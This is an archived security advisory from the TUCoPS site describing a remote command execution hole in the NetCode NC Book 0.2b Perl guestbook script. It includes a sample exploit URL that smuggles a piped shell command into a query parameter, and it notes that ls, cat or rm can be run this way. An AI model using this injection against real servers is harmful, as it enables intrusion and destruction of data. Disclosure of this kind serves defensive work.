Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: ncbook~1.htm

NetCode NC Book 0.2b remote command execution

    NC Book


    NetCode NC Book 0.2b


    'digitalseed' posted  following.   A pretty  big hole  in the main
    script of that guestbook leads to command execution on the  remote
    server running this vulnerable perl script.  Exploit:

        http://target/cgi-bin/ncbook/book.cgi?action=default¤t=|ls -la/|&form_tid=996604045&prev=main.html&list_message_index=10

    The  above  line  if  given  will  output the file contents of the
    kernel dir.  Also you can execute any commands (ls, cat, rm  etc).
    Original discovery: digitalseed and ksenor.


    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH